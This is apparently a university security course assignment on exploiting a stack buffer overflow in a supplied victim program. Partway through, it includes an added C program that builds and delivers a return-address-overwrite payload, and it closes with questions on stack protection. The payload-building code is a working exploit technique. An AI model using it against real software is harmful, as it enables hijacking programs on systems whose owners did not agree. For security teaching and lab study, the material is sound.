CSE544 - Project #1 - Configure Buffer Overflow

Due Date: January 28, 2010.

In this assignment, you will configure an attack program to exploit a buffer overflow vulnerability in a victim program. The victim program is instrumented to print traces that will help you determine how to leverage that vulnerability. Your task is to modify the attack program, based on the victim's traces, so that it overflows the buffer and starts a shell program.

Follow these instructions:

  1. Get the project tarball from here. The project tarball contains: (1) a victim program, cse544-victim.c, which contains a buffer overflow vulnerability and (2) an attack program, cse544-attack.c, which contains code to leverage buffer overflow vulnerabilities in victims.

  2. Instructions for what to do are provided in the slide deck: project 1 slides. These instructions are for development on a Linux system. Please use a Linux system for this. There are several Linux labs around campus, and you can use these machines remotely as well. This project does not require root access.

  3. In general, you need to: (1) configure the stack offset from the start of the buffer to the saved return address (the return address distance); (2) configure the new return address to launch a "jump-to-libc" style attack (note: we will jump to another function in the victim rather than into libc); and (3) write the necessary code to launch the exploit.

  4. Also, please answer the questions below associated with the assignment. Include the answers in an ASCII text file.
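The three configuration steps above, worked through as an added example. This is not the course's cse544-attack.c and makes assumptions the project files may not share: the victim copies attacker-controlled input into a fixed-size stack buffer with a strcpy()-style function, RET_DIST bytes separate the start of that buffer from the saved return address, TARGET_ADDR is the address of the victim function you want to return into (both values are read from the victim's traces, the numbers here are placeholders), and the victim receives the payload as its first command-line argument.

```c
/* Added example: build and deliver a return-address-overwrite payload.
 * RET_DIST, TARGET_ADDR, ADDR_SIZE and the argv[1] delivery are assumptions
 * for illustration; take the real values from the victim's traces. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define RET_DIST    20          /* placeholder: buffer start -> saved RET */
#define TARGET_ADDR 0x08049abcULL /* placeholder: address of victim function */
#define ADDR_SIZE   4           /* 4 on 32-bit x86, 8 on x86-64 */

/* Build the payload: ret_dist filler bytes, then the new return address
 * written little-endian (x86 byte order) `copies` times, so the saved RET
 * is still hit if ret_dist is off by a whole pointer width. A NUL terminator
 * is written after the payload. Returns the payload length, 0 on error. */
size_t build_payload(size_t ret_dist, uint64_t target, size_t addr_size,
                     unsigned copies, unsigned char *out, size_t out_len)
{
    if (copies == 0 || (addr_size != 4 && addr_size != 8))
        return 0;
    size_t len = ret_dist + (size_t)copies * addr_size;
    if (len + 1 > out_len)
        return 0;
    memset(out, 'A', ret_dist);               /* filler up to the saved RET */
    for (unsigned c = 0; c < copies; c++)
        for (size_t i = 0; i < addr_size; i++)
            out[ret_dist + c * addr_size + i] = (unsigned char)(target >> (8 * i));
    out[len] = '\0';
    return len;
}

/* A strcpy()-style victim stops at the first NUL byte. This returns how many
 * bytes such a copy would actually transfer, so you can check that the
 * return address is reached (on x86-64 the high zero bytes of a canonical
 * address must be the last thing copied, i.e. copies must be 1). */
size_t strcpy_copied_len(const unsigned char *payload, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (payload[i] == 0)
            return i;
    return len;
}

/* Launch the victim with the payload as argv[1] (assumed victim interface)
 * and return its wait status, or -1 if fork/exec failed. */
int launch_victim(const char *victim_path, const unsigned char *payload)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *argv[] = { (char *)victim_path, (char *)payload, NULL };
        execv(victim_path, argv);
        _exit(127);                           /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return status;
}

int main(int argc, char **argv)
{
    unsigned char payload[256];
    size_t len = build_payload(RET_DIST, TARGET_ADDR, ADDR_SIZE, 1,
                               payload, sizeof payload);
    if (len == 0) {
        fprintf(stderr, "payload does not fit\n");
        return 1;
    }
    size_t copied = strcpy_copied_len(payload, len);
    if (copied < RET_DIST + 1) {
        fprintf(stderr, "payload has a NUL at byte %zu, before the RET\n", copied);
        return 1;
    }
    if (argc < 2) {
        /* No victim given: dump the payload as hex for inspection in gdb. */
        for (size_t i = 0; i < len; i++)
            printf("%02x%s", payload[i], (i + 1) % 16 ? " " : "\n");
        putchar('\n');
        return 0;
    }
    int status = launch_victim(argv[1], payload);
    return status == -1 ? 1 : WEXITSTATUS(status);
}
```

Run it with no arguments to see the bytes that will overwrite the frame; once RET_DIST and TARGET_ADDR match the victim's traces, pass the victim's path as the first argument to deliver them. If the victim reads from stdin instead of argv, swap launch_victim for a pipe to the child's stdin; the payload construction is unchanged.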

When you have completed the buffer overflow code, submit it via ANGEL by 5:00pm on January 28. Make sure that you have tested your submission prior to uploading. We will build and run your attack (which launches the victim) to verify it. Failure to build either program may result in a failing grade for this assignment.

Questions

  1. Add the gcc flag -fstack-protector to the Makefile's STACK_FLAGS. What is the result? How is the stack changed? Please be precise in your description.

  2. Why is the protection offered by -fstack-protector not enabled by default? Name a useful functionality that this might prevent.

  3. Examine the victim's stack across runs and identify why it is not possible to perform an exploit by injecting code onto the stack. Identify the Linux mechanism that implements this defense. You will need to do some Google research.

You are to complete this on your own. Any sharing of code or help during the coding of this project is expressly forbidden. Do not discuss this project with anyone.


Trent Jaeger
Last modified: Apr 23 23:43:07 EST 2007